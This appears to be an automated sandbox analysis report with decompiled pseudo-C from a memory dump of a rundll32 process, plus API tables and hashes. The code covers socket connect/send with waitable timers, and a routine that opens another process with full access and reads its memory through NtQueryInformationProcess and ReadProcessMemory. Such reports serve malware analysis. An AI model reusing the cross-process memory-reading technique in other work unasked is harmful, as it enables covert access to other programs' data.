                                                                                              																	__eflags = _t112 - 3;
                                                                                              																	if(_t112 != 3) {
                                                                                              																		__eflags = _t112 - 4;
                                                                                              																		if(_t112 != 4) {
                                                                                              																			__eflags = _t112 - 5;
                                                                                              																			if(_t112 != 5) {
                                                                                              																				__eflags = _t112 - 0xffffffff;
                                                                                              																				if(_t112 != 0xffffffff) {
                                                                                              																					goto L63;
                                                                                              																				} else {
                                                                                              																					__imp__#111();
                                                                                              																					 *(_t191 + 0xc) = 1;
                                                                                              																					 *(_t191 + 0x10) = 0;
                                                                                              																					 *(_t191 + 0x14) = _t112;
                                                                                              																					 *(_t191 + 0x18) = 1;
                                                                                              																					goto L54;
                                                                                              																				}
                                                                                              																			} else {
                                                                                              																				goto L47;
                                                                                              																			}
                                                                                              																		} else {
                                                                                              																			__eflags = _v16;
                                                                                              																			if(_v16 == 0) {
                                                                                              																				L47:
                                                                                              																				_t132 =  *((intOrPtr*)( *_t191 + 0xc8))();
                                                                                              																				__eflags = _t132;
                                                                                              																				if(_t132 == 0) {
                                                                                              																					_t133 = GetLastError();
                                                                                              																					__eflags = _t133;
                                                                                              																					 *(_t191 + 0xc) = 1;
                                                                                              																					 *(_t191 + 0x10) = 5;
                                                                                              																					_t134 =  ==  ? 0x4c7 : _t133;
                                                                                              																					 *(_t191 + 0x14) =  ==  ? 0x4c7 : _t133;
                                                                                              																					 *(_t191 + 0x18) = 1;
                                                                                              																					goto L54;
                                                                                              																				} else {
                                                                                              																					goto L48;
                                                                                              																				}
                                                                                              																			} else {
                                                                                              																				L65();
                                                                                              																				__eflags = _t112;
                                                                                              																				if(_t112 == 0) {
                                                                                              																					goto L54;
                                                                                              																				} else {
                                                                                              																					goto L48;
                                                                                              																				}
                                                                                              																			}
                                                                                              																		}
                                                                                              																	} else {
                                                                                              																		_t136 = E0426E3B0(_t112, _t191);
                                                                                              																		__eflags = _t136;
                                                                                              																		if(_t136 == 0) {
                                                                                              																			goto L54;
                                                                                              																		} else {
                                                                                              																			goto L48;
                                                                                              																		}
                                                                                              																	}
                                                                                              																}
                                                                                              															} else {
                                                                                              																_t137 = E0426E540(_t191);
                                                                                              																__eflags = _t137;
                                                                                              																if(_t137 == 0) {
                                                                                              																	goto L54;
                                                                                              																} else {
                                                                                              																	goto L48;
                                                                                              																}
                                                                                              															}
                                                                                              														} else {
                                                                                              															_t138 = E0426E140(_t191);
                                                                                              															__eflags = _t138;
                                                                                              															if(_t138 == 0) {
                                                                                              																goto L54;
                                                                                              															} else {
                                                                                              																goto L48;
                                                                                              															}
                                                                                              														}
                                                                                              														goto L72;
                                                                                              														L48:
                                                                                              														_t169 = _t191;
                                                                                              														_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                                                              														__eflags = _t112;
                                                                                              													} while (_t112 != 0);
                                                                                              													goto L54;
                                                                                              												}
                                                                                              											} else {
                                                                                              												_t140 = E04275B14(0, __eflags, 4);
                                                                                              												_t217 =  &(_t217->LowPart.HighPart);
                                                                                              												_t201 = _t140;
                                                                                              												 *_t201 = 0;
                                                                                              												_t141 = CreateWaitableTimerW(0, 0, 0);
                                                                                              												 *_t201 = _t141;
                                                                                              												__eflags = _t141;
                                                                                              												if(_t141 == 0) {
                                                                                              													_push(0x80004005);
                                                                                              													E04257AC0();
                                                                                              													L63:
                                                                                              													_push(0x80004005);
                                                                                              													E04257AC0();
                                                                                              													L64:
                                                                                              													_push(0x80004005);
                                                                                              													E04257AC0();
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													_push(_t201);
                                                                                              													_t203 = _t169;
                                                                                              													_t122 =  *(_t203 + 0x188);
                                                                                              													 *(_t203 + 0x188) = 1 +  *(_t203 + 0x188);
                                                                                              													__eflags = _t122 -  *((intOrPtr*)(_t203 + 0x38));
                                                                                              													if(_t122 <  *((intOrPtr*)(_t203 + 0x38))) {
                                                                                              														__imp__#19( *((intOrPtr*)(_t203 + 0x1c)), 0, 0, 0);
                                                                                              														__eflags = _t122 - 0xffffffff;
                                                                                              														if(_t122 != 0xffffffff) {
                                                                                              															L71:
                                                                                              															return 1;
                                                                                              														} else {
                                                                                              															__imp__#111();
                                                                                              															__eflags = _t122 - 0x2733;
                                                                                              															if(_t122 == 0x2733) {
                                                                                              																goto L71;
                                                                                              															} else {
                                                                                              																__eflags = _t122;
                                                                                              																if(_t122 == 0) {
                                                                                              																	goto L71;
                                                                                              																} else {
                                                                                              																	 *(_t203 + 0x14) = _t122;
                                                                                              																	__eflags = 0;
                                                                                              																	 *(_t203 + 0xc) = 1;
                                                                                              																	 *(_t203 + 0x10) = 5;
                                                                                              																	 *(_t203 + 0x18) = 1;
                                                                                              																	return 0;
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              													} else {
                                                                                              														 *(_t203 + 0xc) = 1;
                                                                                              														__eflags = 0;
                                                                                              														 *(_t203 + 0x10) = 5;
                                                                                              														 *(_t203 + 0x14) = 0;
                                                                                              														 *(_t203 + 0x18) = 0;
                                                                                              														return 0;
                                                                                              													}
                                                                                              												} else {
                                                                                              													_t160 =  *(_t191 + 0x3c);
                                                                                              													E04291B10();
                                                                                              													_t178 = _t217;
                                                                                              													_t144 = _t160;
                                                                                              													_t145 = _t144 * 0x2710;
                                                                                              													__eflags = _t145;
                                                                                              													asm("adc edx, 0x0");
                                                                                              													_t178->LowPart =  ~_t145;
                                                                                              													_t178->LowPart.HighPart =  ~(_t144 * 0x2710 >> 0x20);
                                                                                              													SetWaitableTimer( *_t201, _t178, _t160, 0, 0, 0);
                                                                                              													_t167 = _v24;
                                                                                              													_t156 = _v20;
                                                                                              													 *(_t167 + 0x10) =  *_t201;
                                                                                              													_t107 = 5;
                                                                                              													goto L25;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											goto L13;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t149 = GetLastError();
                                                                                              								__eflags = _t149;
                                                                                              								_t150 =  ==  ? 0x4c7 : _t149;
                                                                                              								__imp__#112( ==  ? 0x4c7 : _t149);
                                                                                              								return 0;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
                                                                                              					if(__eax == 0xffffffff) {
                                                                                              						L14:
                                                                                              						return _t189;
                                                                                              					} else {
                                                                                              						_t152 = _a4;
                                                                                              						_t181 =  !=  ? 0x1c : 0x10;
                                                                                              						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t152,  !=  ? 0x1c : 0x10);
                                                                                              						if(_t152 == 0) {
                                                                                              							L13:
                                                                                              							_t189 = 1;
                                                                                              							goto L14;
                                                                                              						} else {
                                                                                              							if(_t152 != 0xffffffff) {
                                                                                              								L5:
                                                                                              								return 0;
                                                                                              							} else {
                                                                                              								__imp__#111();
                                                                                              								if(_t152 == 0x2733) {
                                                                                              									goto L13;
                                                                                              								} else {
                                                                                              									goto L5;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L72:
                                                                                              			}

















































                                                                                              0x0426dca1
                                                                                              0x0426dca5
                                                                                              0x0426dca7
                                                                                              0x0426dcac
                                                                                              0x0426dd0c
                                                                                              0x0426dd19
                                                                                              0x0426dd1d
                                                                                              0x0426dd25
                                                                                              0x0426dd2b
                                                                                              0x0426dd2e
                                                                                              0x00000000
                                                                                              0x0426dd30
                                                                                              0x0426dd38
                                                                                              0x0426dd3e
                                                                                              0x0426dd41
                                                                                              0x00000000
                                                                                              0x0426dd43
                                                                                              0x0426dd43
                                                                                              0x0426dd4c
                                                                                              0x0426dd53
                                                                                              0x0426dd5d
                                                                                              0x0426dd60
                                                                                              0x0426dd63
                                                                                              0x0426dd8d
                                                                                              0x0426dd93
                                                                                              0x0426dd96
                                                                                              0x00000000
                                                                                              0x0426dd98
                                                                                              0x0426dd98
                                                                                              0x0426dd9e
                                                                                              0x0426dda3
                                                                                              0x00000000
                                                                                              0x0426dda5
                                                                                              0x0426dda5
                                                                                              0x0426dda7
                                                                                              0x0426ddbb
                                                                                              0x0426ddc0
                                                                                              0x0426ddc1
                                                                                              0x0426ddc2
                                                                                              0x0426ddc3
                                                                                              0x0426ddc4
                                                                                              0x0426ddc5
                                                                                              0x0426ddc6
                                                                                              0x0426ddc7
                                                                                              0x0426ddc8
                                                                                              0x0426ddc9
                                                                                              0x0426ddca
                                                                                              0x0426ddcb
                                                                                              0x0426ddcc
                                                                                              0x0426ddcd
                                                                                              0x0426ddce
                                                                                              0x0426ddcf
                                                                                              0x0426ddd0
                                                                                              0x0426ddd1
                                                                                              0x0426ddd2
                                                                                              0x0426ddd3
                                                                                              0x0426ddd4
                                                                                              0x0426ddd5
                                                                                              0x0426ddd6
                                                                                              0x0426ddd7
                                                                                              0x0426ddd8
                                                                                              0x0426ddd9
                                                                                              0x0426ddda
                                                                                              0x0426dddb
                                                                                              0x0426dddc
                                                                                              0x0426dddd
                                                                                              0x0426ddde
                                                                                              0x0426dddf
                                                                                              0x0426dde1
                                                                                              0x0426dde3
                                                                                              0x0426dde6
                                                                                              0x0426dded
                                                                                              0x0426ddf9
                                                                                              0x0426ddfc
                                                                                              0x0426de05
                                                                                              0x0426de0b
                                                                                              0x0426de0f
                                                                                              0x0426de16
                                                                                              0x0426de25
                                                                                              0x0426de25
                                                                                              0x0426de25
                                                                                              0x0426de18
                                                                                              0x0426de18
                                                                                              0x0426de1c
                                                                                              0x00000000
                                                                                              0x0426de1e
                                                                                              0x0426de1e
                                                                                              0x0426de1e
                                                                                              0x0426de1c
                                                                                              0x0426de2b
                                                                                              0x0426de34
                                                                                              0x0426de36
                                                                                              0x0426de36
                                                                                              0x0426de39
                                                                                              0x0426de3c
                                                                                              0x0426de3f
                                                                                              0x0426de41
                                                                                              0x0426de43
                                                                                              0x0426de43
                                                                                              0x0426de44
                                                                                              0x0426de44
                                                                                              0x0426de4a
                                                                                              0x0426de52
                                                                                              0x0426de54
                                                                                              0x0426de56
                                                                                              0x0426de59
                                                                                              0x0426de61
                                                                                              0x0426de6a
                                                                                              0x0426de73
                                                                                              0x0426de76
                                                                                              0x0426de7b
                                                                                              0x0426de7e
                                                                                              0x0426deeb
                                                                                              0x0426deeb
                                                                                              0x0426deed
                                                                                              0x0426deef
                                                                                              0x0426deef
                                                                                              0x0426def5
                                                                                              0x0426def8
                                                                                              0x0426defb
                                                                                              0x0426defd
                                                                                              0x0426df00
                                                                                              0x0426df05
                                                                                              0x0426df08
                                                                                              0x0426df0f
                                                                                              0x0426df16
                                                                                              0x0426df16
                                                                                              0x0426df23
                                                                                              0x0426df26
                                                                                              0x0426df2d
                                                                                              0x0426df2f
                                                                                              0x0426df32
                                                                                              0x0426df34
                                                                                              0x0426e034
                                                                                              0x0426e03d
                                                                                              0x0426e03f
                                                                                              0x0426e045
                                                                                              0x0426e049
                                                                                              0x0426e04d
                                                                                              0x0426e04f
                                                                                              0x0426e052
                                                                                              0x0426e054
                                                                                              0x0426e058
                                                                                              0x0426e05a
                                                                                              0x0426e05a
                                                                                              0x0426e054
                                                                                              0x0426e05d
                                                                                              0x0426e063
                                                                                              0x0426e065
                                                                                              0x0426e083
                                                                                              0x0426e08e
                                                                                              0x0426e098
                                                                                              0x0426e067
                                                                                              0x0426e067
                                                                                              0x0426e069
                                                                                              0x0426e06b
                                                                                              0x0426e078
                                                                                              0x0426e078
                                                                                              0x0426e07b
                                                                                              0x00000000
                                                                                              0x0426e06d
                                                                                              0x0426e06e
                                                                                              0x0426e074
                                                                                              0x0426e076
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426e076
                                                                                              0x0426e06b
                                                                                              0x0426df3a
                                                                                              0x0426df3a
                                                                                              0x0426df40
                                                                                              0x0426df4a
                                                                                              0x0426df50
                                                                                              0x0426df52
                                                                                              0x0426df65
                                                                                              0x0426df68
                                                                                              0x0426df7b
                                                                                              0x0426df7e
                                                                                              0x0426e02d
                                                                                              0x00000000
                                                                                              0x0426df84
                                                                                              0x0426df84
                                                                                              0x0426df87
                                                                                              0x0426df9a
                                                                                              0x0426df9d
                                                                                              0x0426dfb6
                                                                                              0x0426dfb9
                                                                                              0x0426e004
                                                                                              0x0426e007
                                                                                              0x00000000
                                                                                              0x0426e00d
                                                                                              0x0426e00d
                                                                                              0x0426e013
                                                                                              0x0426e01a
                                                                                              0x0426e021
                                                                                              0x0426e024
                                                                                              0x00000000
                                                                                              0x0426e024
                                                                                              0x0426dfbb
                                                                                              0x00000000
                                                                                              0x0426dfbb
                                                                                              0x0426df9f
                                                                                              0x0426df9f
                                                                                              0x0426dfa5
                                                                                              0x0426dfbd
                                                                                              0x0426dfbf
                                                                                              0x0426dfc5
                                                                                              0x0426dfc7
                                                                                              0x0426dfda
                                                                                              0x0426dfe0
                                                                                              0x0426dfe2
                                                                                              0x0426dfee
                                                                                              0x0426dff5
                                                                                              0x0426dff8
                                                                                              0x0426dffb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426dfa7
                                                                                              0x0426dfa7
                                                                                              0x0426dfac
                                                                                              0x0426dfae
                                                                                              0x00000000
                                                                                              0x0426dfb4
                                                                                              0x00000000
                                                                                              0x0426dfb4
                                                                                              0x0426dfae
                                                                                              0x0426dfa5
                                                                                              0x0426df89
                                                                                              0x0426df8b
                                                                                              0x0426df90
                                                                                              0x0426df92
                                                                                              0x00000000
                                                                                              0x0426df98
                                                                                              0x00000000
                                                                                              0x0426df98
                                                                                              0x0426df92
                                                                                              0x0426df87
                                                                                              0x0426df6a
                                                                                              0x0426df6c
                                                                                              0x0426df71
                                                                                              0x0426df73
                                                                                              0x00000000
                                                                                              0x0426df79
                                                                                              0x00000000
                                                                                              0x0426df79
                                                                                              0x0426df73
                                                                                              0x0426df54
                                                                                              0x0426df56
                                                                                              0x0426df5b
                                                                                              0x0426df5d
                                                                                              0x00000000
                                                                                              0x0426df63
                                                                                              0x00000000
                                                                                              0x0426df63
                                                                                              0x0426df5d
                                                                                              0x00000000
                                                                                              0x0426dfc9
                                                                                              0x0426dfcb
                                                                                              0x0426dfcd
                                                                                              0x0426dfd0
                                                                                              0x0426dfd0
                                                                                              0x00000000
                                                                                              0x0426dfd8
                                                                                              0x0426de80
                                                                                              0x0426de81
                                                                                              0x0426de86
                                                                                              0x0426de89
                                                                                              0x0426de91
                                                                                              0x0426de97
                                                                                              0x0426de9d
                                                                                              0x0426de9f
                                                                                              0x0426dea1
                                                                                              0x0426e09b
                                                                                              0x0426e0a0
                                                                                              0x0426e0a5
                                                                                              0x0426e0a5
                                                                                              0x0426e0aa
                                                                                              0x0426e0af
                                                                                              0x0426e0af
                                                                                              0x0426e0b4
                                                                                              0x0426e0b9
                                                                                              0x0426e0ba
                                                                                              0x0426e0bb
                                                                                              0x0426e0bc
                                                                                              0x0426e0bd
                                                                                              0x0426e0be
                                                                                              0x0426e0bf
                                                                                              0x0426e0c0
                                                                                              0x0426e0c1
                                                                                              0x0426e0c6
                                                                                              0x0426e0cc
                                                                                              0x0426e0d2
                                                                                              0x0426e0d4
                                                                                              0x0426e0ff
                                                                                              0x0426e105
                                                                                              0x0426e108
                                                                                              0x0426e137
                                                                                              0x0426e13d
                                                                                              0x0426e10a
                                                                                              0x0426e10a
                                                                                              0x0426e110
                                                                                              0x0426e115
                                                                                              0x00000000
                                                                                              0x0426e117
                                                                                              0x0426e117
                                                                                              0x0426e119
                                                                                              0x00000000
                                                                                              0x0426e11b
                                                                                              0x0426e11b
                                                                                              0x0426e11e
                                                                                              0x0426e120
                                                                                              0x0426e127
                                                                                              0x0426e12e
                                                                                              0x0426e136
                                                                                              0x0426e136
                                                                                              0x0426e119
                                                                                              0x0426e115
                                                                                              0x0426e0d6
                                                                                              0x0426e0d6
                                                                                              0x0426e0dd
                                                                                              0x0426e0df
                                                                                              0x0426e0e6
                                                                                              0x0426e0ed
                                                                                              0x0426e0f5
                                                                                              0x0426e0f5
                                                                                              0x0426dea7
                                                                                              0x0426dea7
                                                                                              0x0426deaf
                                                                                              0x0426deb4
                                                                                              0x0426deb6
                                                                                              0x0426debd
                                                                                              0x0426debd
                                                                                              0x0426dec7
                                                                                              0x0426deca
                                                                                              0x0426ded0
                                                                                              0x0426ded5
                                                                                              0x0426dedb
                                                                                              0x0426dee0
                                                                                              0x0426dee3
                                                                                              0x0426dee6
                                                                                              0x00000000
                                                                                              0x0426dee6
                                                                                              0x0426dea1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426dda7
                                                                                              0x0426dda3
                                                                                              0x0426dd65
                                                                                              0x0426dd65
                                                                                              0x0426dd6b
                                                                                              0x0426dd72
                                                                                              0x0426dd76
                                                                                              0x0426dd81
                                                                                              0x0426dd81
                                                                                              0x0426dd63
                                                                                              0x0426dd41
                                                                                              0x0426dcae
                                                                                              0x0426dcb6
                                                                                              0x0426dcbf
                                                                                              0x0426ddae
                                                                                              0x0426ddb3
                                                                                              0x0426dcc5
                                                                                              0x0426dcc5
                                                                                              0x0426dcd6
                                                                                              0x0426dcde
                                                                                              0x0426dce6
                                                                                              0x0426dda9
                                                                                              0x0426dda9
                                                                                              0x00000000
                                                                                              0x0426dcec
                                                                                              0x0426dcef
                                                                                              0x0426dd02
                                                                                              0x0426dd09
                                                                                              0x0426dcf1
                                                                                              0x0426dcf1
                                                                                              0x0426dcfc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426dcfc
                                                                                              0x0426dcef
                                                                                              0x0426dce6
                                                                                              0x0426dcbf
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 0426DCB6
                                                                                              • connect.WS2_32(?,?,00000010), ref: 0426DCDE
                                                                                              • WSAGetLastError.WS2_32(?,74CB4D40,?,0426D884,?,00000005), ref: 0426DCF1
                                                                                              • connect.WS2_32(?,?,00000010), ref: 0426DD25
                                                                                              • WSAEventSelect.WS2_32(?,?,00000023), ref: 0426DD38
                                                                                              • SetLastError.KERNEL32(00000000,?,74CB4D40,?,0426D884,?,00000005), ref: 0426DD53
                                                                                              • GetLastError.KERNEL32(?,74CB4D40,?,0426D884,?,00000005), ref: 0426DD65
                                                                                              • WSASetLastError.WS2_32(00000000,?,74CB4D40,?,0426D884,?,00000005), ref: 0426DD76
                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 0426DD8D
                                                                                              • WSAGetLastError.WS2_32(?,74CB4D40,?,0426D884,?,00000005), ref: 0426DD98
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426DDFC
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426DE00
                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0426DE97
                                                                                              • SetWaitableTimer.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 0426DED5
                                                                                              • WSAWaitForMultipleEvents.WS2_32(?,?,00000000,000000FF,00000000,?,00000000,?,74CB4C30), ref: 0426DF4A
                                                                                              • GetLastError.KERNEL32(?,00000000,?,74CB4C30), ref: 0426DFDA
                                                                                              • WSAGetLastError.WS2_32(?,00000000,?,74CB4C30), ref: 0426E00D
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426E036
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426E05D
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,74CB4C30), ref: 0426E06E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnect$CloseCreateEventsHandleMultipleWaitsend
                                                                                              • String ID:
                                                                                              • API String ID: 2019364350-0
                                                                                              • Opcode ID: 6cb4f3b94d0ed425dea5d7790f60ba2a9f2caf6e91d09e281b14e0f030499ff4
                                                                                              • Instruction ID: aa7ec5257c8d96126618a5698b5978bcfc33baf7867a5d75eb5af4ad317874b9
                                                                                              • Opcode Fuzzy Hash: 6cb4f3b94d0ed425dea5d7790f60ba2a9f2caf6e91d09e281b14e0f030499ff4
                                                                                              • Instruction Fuzzy Hash: 36C1C070720206EFEB20AF68D848B6AB7A5FF44314F244629E516DB6C0DB75FC91CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 77%
                                                                                              			E04256060(void* __ebx, intOrPtr* __ecx, long __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				DWORD* _v20;
                                                                                              				DWORD* _v36;
                                                                                              				void* _v44;
                                                                                              				signed int _v48;
                                                                                              				void _v112;
                                                                                              				void* _v568;
                                                                                              				void _v584;
                                                                                              				DWORD* _v588;
                                                                                              				DWORD* _v592;
                                                                                              				void* _v612;
                                                                                              				char _v616;
                                                                                              				signed int _t46;
                                                                                              				void* _t49;
                                                                                              				_Unknown_base(*)()* _t51;
                                                                                              				_Unknown_base(*)()* _t53;
                                                                                              				struct HINSTANCE__* _t54;
                                                                                              				signed int _t55;
                                                                                              				signed int _t59;
                                                                                              				signed int _t61;
                                                                                              				signed int _t80;
                                                                                              				void* _t90;
                                                                                              				intOrPtr _t104;
                                                                                              				intOrPtr* _t118;
                                                                                              				void* _t120;
                                                                                              				void* _t122;
                                                                                              				signed int _t123;
                                                                                              
                                                                                              				_t46 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t46 ^ _t123;
                                                                                              				_t118 = __ecx;
                                                                                              				_t90 = OpenProcess(0x1fffff, 0, __edx);
                                                                                              				_t49 = GetCurrentProcess();
                                                                                              				_t120 = LoadLibraryA;
                                                                                              				_v588 = _t49;
                                                                                              				_v592 = 0;
                                                                                              				_t51 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                              				if(_t51 != 0) {
                                                                                              					 *_t51(_v588,  &_v592);
                                                                                              				}
                                                                                              				_v588 = 0;
                                                                                              				_t53 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                              				if(_t53 != 0) {
                                                                                              					 *_t53(_t90,  &_v588);
                                                                                              				}
                                                                                              				if(_v592 != 1 || _v588 != 0) {
                                                                                              					_t54 = GetModuleHandleA("ntdll.dll");
                                                                                              					__eflags = _t54;
                                                                                              					if(_t54 != 0) {
                                                                                              						L9:
                                                                                              						_t55 = GetProcAddress(_t54, "NtQueryInformationProcess");
                                                                                              						__eflags = _t55;
                                                                                              						if(_t55 == 0) {
                                                                                              							goto L18;
                                                                                              						} else {
                                                                                              							_t59 =  *_t55(_t90, 0,  &_v616, 0x18, 0);
                                                                                              							__eflags = _t59;
                                                                                              							if(_t59 < 0) {
                                                                                              								goto L18;
                                                                                              							} else {
                                                                                              								_t61 = ReadProcessMemory(_t90, _v612,  &_v584, 0x1d8, 0);
                                                                                              								__eflags = _t61;
                                                                                              								if(_t61 == 0) {
                                                                                              									goto L18;
                                                                                              								} else {
                                                                                              									__eflags = ReadProcessMemory(_t90, _v568,  &_v112, 0x48, 0);
                                                                                              									if(__eflags == 0) {
                                                                                              										goto L18;
                                                                                              									} else {
                                                                                              										_push( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002);
                                                                                              										_t122 = E04275B55( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002, ReadProcessMemory, __eflags);
                                                                                              										E0427DEA0(_t118, _t122, 0, 2 + (_v48 & 0x0000ffff) * 2);
                                                                                              										ReadProcessMemory(_t90, _v44, _t122, _v48 & 0x0000ffff, 0);
                                                                                              										E042531B0( &_v36, _t118, _t122);
                                                                                              										E04275B0F(_t122);
                                                                                              										 *((intOrPtr*)(_t118 + 0x14)) = 7;
                                                                                              										 *(_t118 + 0x10) = 0;
                                                                                              										 *_t118 = 0;
                                                                                              										_t104 = _v16;
                                                                                              										__eflags = _t104 - 8;
                                                                                              										if(_t104 >= 8) {
                                                                                              											 *_t118 = _v36;
                                                                                              											_v36 = 0;
                                                                                              										} else {
                                                                                              											_t80 =  &(_v20[0]);
                                                                                              											__eflags = _t80;
                                                                                              											if(_t80 != 0) {
                                                                                              												E0427D060(_t118,  &_v36, _t80 + _t80);
                                                                                              												_t104 = _v16;
                                                                                              											}
                                                                                              										}
                                                                                              										 *(_t118 + 0x10) = _v20;
                                                                                              										 *((intOrPtr*)(_t118 + 0x14)) = _t104;
                                                                                              										_v16 = 7;
                                                                                              										_v20 = 0;
                                                                                              										_v36 = 0;
                                                                                              										E04253170( &_v36);
                                                                                              										__eflags = _v12 ^ _t123;
                                                                                              										return E04275AFE(_v12 ^ _t123);
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t54 = LoadLibraryA("ntdll.dll");
                                                                                              						__eflags = _t54;
                                                                                              						if(_t54 == 0) {
                                                                                              							L18:
                                                                                              							E042531B0(_t118, _t118, 0x429c5d0);
                                                                                              							__eflags = _v12 ^ _t123;
                                                                                              							return E04275AFE(_v12 ^ _t123);
                                                                                              						} else {
                                                                                              							goto L9;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					E04255DA0(_t90, _t118, _t90, _t118, _t120);
                                                                                              					return E04275AFE(_v12 ^ _t123);
                                                                                              				}
                                                                                              			}































                                                                                              0x04256069
                                                                                              0x04256070
                                                                                              0x0425607e
                                                                                              0x04256086
                                                                                              0x04256088
                                                                                              0x0425608e
                                                                                              0x0425609e
                                                                                              0x042560a4
                                                                                              0x042560b1
                                                                                              0x042560b9
                                                                                              0x042560c8
                                                                                              0x042560c8
                                                                                              0x042560d4
                                                                                              0x042560e1
                                                                                              0x042560e9
                                                                                              0x042560f3
                                                                                              0x042560f3
                                                                                              0x042560fc
                                                                                              0x04256128
                                                                                              0x0425612e
                                                                                              0x04256130
                                                                                              0x04256141
                                                                                              0x04256147
                                                                                              0x0425614d
                                                                                              0x0425614f
                                                                                              0x00000000
                                                                                              0x04256155
                                                                                              0x04256163
                                                                                              0x04256165
                                                                                              0x04256167
                                                                                              0x00000000
                                                                                              0x0425616d
                                                                                              0x04256188
                                                                                              0x0425618a
                                                                                              0x0425618c
                                                                                              0x00000000
                                                                                              0x04256192
                                                                                              0x042561a3
                                                                                              0x042561a5
                                                                                              0x00000000
                                                                                              0x042561ab
                                                                                              0x042561c0
                                                                                              0x042561cd
                                                                                              0x042561da
                                                                                              0x042561ee
                                                                                              0x042561f8
                                                                                              0x042561fe
                                                                                              0x04256205
                                                                                              0x0425620c
                                                                                              0x04256216
                                                                                              0x04256219
                                                                                              0x0425621c
                                                                                              0x0425621f
                                                                                              0x04256241
                                                                                              0x04256243
                                                                                              0x04256221
                                                                                              0x04256224
                                                                                              0x04256224
                                                                                              0x04256227
                                                                                              0x04256231
                                                                                              0x04256236
                                                                                              0x04256239
                                                                                              0x04256227
                                                                                              0x0425624d
                                                                                              0x04256252
                                                                                              0x04256258
                                                                                              0x0425625f
                                                                                              0x04256266
                                                                                              0x0425626a
                                                                                              0x04256277
                                                                                              0x04256281
                                                                                              0x04256281
                                                                                              0x042561a5
                                                                                              0x0425618c
                                                                                              0x04256167
                                                                                              0x04256132
                                                                                              0x04256137
                                                                                              0x04256139
                                                                                              0x0425613b
                                                                                              0x04256282
                                                                                              0x04256289
                                                                                              0x04256295
                                                                                              0x042562a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425613b
                                                                                              0x04256107
                                                                                              0x0425610b
                                                                                              0x04256122
                                                                                              0x04256122

                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000), ref: 04256080
                                                                                              • GetCurrentProcess.KERNEL32 ref: 04256088
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 042560AE
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 042560B1
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 042560DE
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 042560E1
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04256128
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04256137
                                                                                              • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 04256147
                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000), ref: 04256188
                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000), ref: 042561A1
                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 042561EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
